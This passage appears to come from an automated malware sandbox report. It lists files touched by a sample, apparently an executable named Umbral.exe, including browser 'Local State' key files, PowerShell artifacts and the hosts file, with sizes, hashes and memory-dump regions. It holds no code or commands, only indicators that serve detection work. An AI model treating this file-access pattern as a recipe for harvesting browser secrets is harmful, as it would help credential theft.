0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6d082fb1352fbf59ee6686f4bfb0c727

SHA1
31a31c18b0a039c0450338739edca79bd9bfcb81

SHA256
2f652fd7b5b5835e4c5a7ac1c7bd6aa9cd8d97be94b259d8ce03e583811a9692

SHA512
02302c050d6520df8baa36d3745d54a3c127424d2e4fb877c7d93379b355c3a9beec604987c99ce45543e7db089b6e872dac08aa78435b6ed10020fe7c884a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1c806e1503a8c80d95f9ec52f08fd003

SHA1
3b68446f731fe7c7dc34771c81b72075aeca8a54

SHA256
e30a0e02416a0e36d631776b6d1fae1ff64a1b32301787ba87008c60eb573b9d

SHA512
e810109cd41784eef3663b25ef246b3008b41648ef2cd988b56b330a06de5ec38b9face5732793276a51702144431bb8c3e16bdc333dd19e8cd69f83059d2363

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a4560c27585b32e4c1861b1ba89afd66

SHA1
ac5ddb609b928f429d0e94bf41db64041941fe47

SHA256
b8760aed028a813f848549b71ad1398af1114ac4016e411f9b119204c62aca8b

SHA512
2e4a904b1fe7059564a2ffbfc3aa40bb37597bda87c7fdb9cd67e412f273f24017b6f1d7e2ae48bcb04ceab592f75ad4c2d03a80ea3f29a31ac63f409d6eee81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
37b49b3aaab56a6760c93b01942df375

SHA1
299d2263bd81cf6311efe909efdb85482450277b

SHA256
ea77e8d42ba4e29f952be926da85fcab5e1843eda4df3edf8e462b0289d9deec

SHA512
a00886c965f38cf93cf2b9429d676aa622714c705b8177a0c1429e1c8f8e78dd77a49b0726007224f3d1433961d400f58956fb296adeecfe4534b42cece2e93c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
21611ef5daaec664e12c02c87be485f9

SHA1
4ccf0139e3144bb5d4266b708b9e8c1d4e81b5f5

SHA256
472aab3973106f7021328b29748f9f416ffe3a79d93138431617bc05fbf7e5bd

SHA512
8e45f80cb5f56ddd6148cc3c826987643cfbda8ce2ce678a1b233215e24d9713fbd9840a20381cbfdd43e55b91f045072ef4c5be002211181fff9c94b95c4897

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
df6c4e5c3091c14551e6c92f07717617

SHA1
1ea87111035496c1b2b74cef8b5c62d00ac072c9

SHA256
b79dc75372707ff84a643a9e4cff6fad2d1a936b54d458088850c62c96e2f231

SHA512
ab861efd0ff28a4bae3513a884d5b00c1b68d8f0bd54a00428bbb65a6954f8778e8f5300362025265251cb425c5ed77608b10776f382c3b392916ae46e38db35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
420a0347ed335b631f37d5a2a9f43e9c

SHA1
6da034294d727b44aa8d6bf6f157f2fe53580617

SHA256
88d3576e3b3acd7f044774fc291158cab5f73e9322ea755ac3f88b3a9c971a16

SHA512
9e9cde7a08a9ed233d3a140db0de5bc2f725a9194fbdd4c734dea71fa49c4f6fadb4d4dc2b45345b0aa7e7dc1b9dae23d3eefaea2d86d3e48501503fb2b85596

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ja20gaz.x5b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\Umbral.exe

Filesize
229KB

MD5
9753f0d7f95bc519a467461149d3a375

SHA1
6f0ad2be5208d452f712842f043212ab6d849e53

SHA256
9fd189fa7fba6b3d344e9ad05af15bc44033c87c84d2fb7007956e5ce1061bd1

SHA512
d43d7825dce93ea04eae858ee861924bd3df57083e33b59a7c933c49d0e7eeeb6ab41931700adb13e7a54042cebc974872dffc33bd7677c49f04056cb3a4c585

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 859257.crdownload

Filesize
3.3MB

MD5
f355889db3ff6bae624f80f41a52e619

SHA1
47f7916272a81d313e70808270c3c351207b890f

SHA256
8e95865efd39220dfc4abebc27141d9eae288a11981e43f09cbee6bf90347fe0

SHA512
bff7636f6cc0fadfd6f027e2ebda9e80fd5c64d551b2c666929b2d990509af73b082d739f14bb1497be292eafe703ebd5d7188493e2cc34b73d249fe901820eb

Download Submit
C:\Users\Admin\Downloads\a5e1025e-559b-479a-9787-8b4cc65766e0.tmp

Filesize
110KB

MD5
f6373c2e28bdeab228ca21f50c566b56

SHA1
34af1f245e65cec27f48eebb36fce8fbbba4b694

SHA256
992473b1eb3709e13c0a949b2a9f0e622c459a0105e6a3042d846be6fc42d2c0

SHA512
e046f73b3089e3f780741554bbe408d7c1cf68c568d45622bbd72d94b433f74dda0aa7e628f9d97de0d2c2111816e549350f3588dfb3b86a5a179668c9056d69

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1648-1792-0x000001782A4C0000-0x000001782A4DE000-memory.dmp

Filesize
120KB

Download
memory/1648-1790-0x000001782A5A0000-0x000001782A5F0000-memory.dmp

Filesize
320KB

Download
memory/1648-1788-0x000001782A520000-0x000001782A596000-memory.dmp

Filesize
472KB

Download
memory/1648-1760-0x000001780FDD0000-0x000001780FE10000-memory.dmp

Filesize
256KB

Download
memory/1648-1837-0x000001782A4A0000-0x000001782A4AA000-memory.dmp

Filesize
40KB

Download
memory/1648-1838-0x000001782A500000-0x000001782A512000-memory.dmp

Filesize
72KB

Download
memory/5632-1761-0x000001F2E9D50000-0x000001F2E9D72000-memory.dmp

Filesize
136KB

Download
memory/5996-215-0x00000238DBF30000-0x00000238DBF50000-memory.dmp

Filesize
128KB

Download
memory/5996-214-0x00000238C1B10000-0x00000238C1B32000-memory.dmp

Filesize
136KB

Download
memory/5996-1747-0x00000238DD1E0000-0x00000238DD23E000-memory.dmp

Filesize
376KB

Download
memory/5996-223-0x00000238DC350000-0x00000238DC466000-memory.dmp

Filesize
1.1MB

Download
memory/5996-1749-0x00000238DD1A0000-0x00000238DD1BA000-memory.dmp

Filesize
104KB

Download
memory/5996-216-0x00000238DBF50000-0x00000238DBF70000-memory.dmp

Filesize
128KB

Download
memory/5996-222-0x00000238DC4A0000-0x00000238DC5EA000-memory.dmp

Filesize
1.3MB

Download
memory/5996-224-0x00000238DC0D0000-0x00000238DC100000-memory.dmp

Filesize
192KB

Download
memory/5996-217-0x00000238DC280000-0x00000238DC2EE000-memory.dmp

Filesize
440KB

Download
memory/5996-218-0x00000238DBF70000-0x00000238DBF7E000-memory.dmp

Filesize
56KB

Download
memory/5996-1750-0x00000238DD1C0000-0x00000238DD1DA000-memory.dmp

Filesize
104KB

Download
memory/5996-1748-0x00000238DCFE0000-0x00000238DCFEE000-memory.dmp

Filesize
56KB

Download
memory/5996-221-0x00000238DBFB0000-0x00000238DBFCE000-memory.dmp

Filesize
120KB

Download
memory/5996-220-0x00000238DBF80000-0x00000238DBF90000-memory.dmp

Filesize
64KB

Download
memory/5996-219-0x00000238DC2F0000-0x00000238DC34A000-memory.dmp

Filesize
360KB

Download
memory/6096-2098-0x00000210994D0000-0x00000210994D1000-memory.dmp

Filesize
4KB

Download
memory/6096-2100-0x00000210994D0000-0x00000210994D1000-memory.dmp

Filesize
4KB

Download
memory/6096-2101-0x0000021099560000-0x0000021099561000-memory.dmp

Filesize
4KB

Download
memory/6096-2102-0x0000021099560000-0x0000021099561000-memory.dmp

Filesize
4KB

Download
memory/6096-2103-0x0000021099570000-0x0000021099571000-memory.dmp

Filesize
4KB

Download
memory/6096-2104-0x0000021099570000-0x0000021099571000-memory.dmp

Filesize
4KB

Download
memory/6096-2096-0x0000021099450000-0x0000021099451000-memory.dmp

Filesize
4KB

Download
memory/6096-2089-0x0000021091160000-0x0000021091170000-memory.dmp

Filesize
64KB

Download
memory/6096-2085-0x00000210907C0000-0x00000210907D0000-memory.dmp

Filesize
64KB

Download